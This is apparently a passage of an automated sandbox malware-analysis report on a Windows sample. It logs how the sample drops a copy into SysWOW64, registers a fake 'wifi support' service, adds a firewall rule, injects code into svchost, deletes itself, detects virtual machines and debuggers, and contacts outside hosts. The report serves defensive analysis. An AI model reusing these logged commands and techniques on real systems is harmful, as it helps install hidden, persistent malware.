            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ghrubsm
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d"C:\Users\user\Desktop\OcmKX57vR7.exe"
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi supportJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conectionJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ghrubsmJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nulJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile created: C:\Users\user\AppData\Local\Temp\pjzcupje.exeJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,0_2_00406A60
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6956:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: OcmKX57vR7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb source: OcmKX57vR7.exe, pjzcupje.exe.0.dr
            Source: Binary string: [C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb source: OcmKX57vR7.exe, pjzcupje.exe.0.dr

            Data Obfuscation

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeUnpacked PE file: 0.2.OcmKX57vR7.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeUnpacked PE file: 13.2.pjzcupje.exe.400000.0.unpack
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeUnpacked PE file: 0.2.OcmKX57vR7.exe.400000.0.unpack .text:ER;.data:W;.xovuhih:W;.nos:W;.xij:W;.devo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeUnpacked PE file: 13.2.pjzcupje.exe.400000.0.unpack .text:ER;.data:W;.xovuhih:W;.nos:W;.xij:W;.devo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0042FFE8 push edx; ret 0_2_0042FFE9
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_0042FFE8 push edx; ret 13_2_0042FFE9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02522F0F push eax; iretd 17_2_02522F10
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
            Source: OcmKX57vR7.exeStatic PE information: section name: .xovuhih
            Source: OcmKX57vR7.exeStatic PE information: section name: .nos
            Source: OcmKX57vR7.exeStatic PE information: section name: .xij
            Source: OcmKX57vR7.exeStatic PE information: section name: .devo

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: unknownExecutable created and started: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile created: C:\Users\user\AppData\Local\Temp\pjzcupje.exeJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe (copy)Jump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ghrubsmJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B

            Hooking and other Techniques for Hiding and Protection

            barindex
            Deletes itself after installation
            Source: C:\Windows\SysWOW64\svchost.exeFile deleted: c:\users\user\desktop\ocmkx57vr7.exeJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00401000
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_13-20256
            Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_17-7587
            Source: C:\Windows\SysWOW64\svchost.exe TID: 6964Thread sleep count: 100 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 6964Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 6196Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 1664Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 1820Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_17-7336
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_13-20212
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_17-6184
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-28028
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-19858
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeAPI coverage: 5.8 %
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeAPI coverage: 6.8 %
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeEvaded block: after key decisiongraph_0-27998
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeEvaded block: after key decisiongraph_13-19828
            Source: C:\Windows\SysWOW64\svchost.exeEvaded block: after key decisiongraph_17-6269
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,17_2_0251199C
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeAPI call chain: ExitProcess graph end nodegraph_13-20216
            Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_17-6185
            Source: svchost.exe, 0000001A.00000002.528966666.0000023757A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
            Source: svchost.exe, 00000022.00000002.528970263.00000290CD854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
            Source: svchost.exe, 00000022.00000002.528970263.00000290CD854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
            Source: svchost.exe, 00000012.00000002.527907526.000001D489802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
            Source: svchost.exe, 0000001A.00000002.528952167.0000023757A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.528290622.0000023752429000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438828550.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438088492.000001D6C5081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.401236022.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528394040.00000290CC8C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528209046.00000290CC852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
            Source: svchost.exe, 00000012.00000002.528059713.000001D489840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.528201116.000001EC65A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,0_2_00401D96

            Anti Debugging

            barindex
            Found API chain indicative of debugger detection
            Source: C:\Windows\SysWOW64\svchost.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_17-7643
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00AD092B mov eax, dword ptr fs:[00000030h]0_2_00AD092B
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00AD0D90 mov eax, dword ptr fs:[00000030h]0_2_00AD0D90
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap,0_2_0040EBCC
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,13_2_00409A6B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02519A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,17_2_02519A6B

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeDomain query: svartalfheim.top
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.173.215.82 443Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
            Allocates memory in foreign processes
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 2510000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2510000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2510000Jump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 26D1008Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\Jump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi supportJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conectionJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ghrubsmJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nulJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00406EDD
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
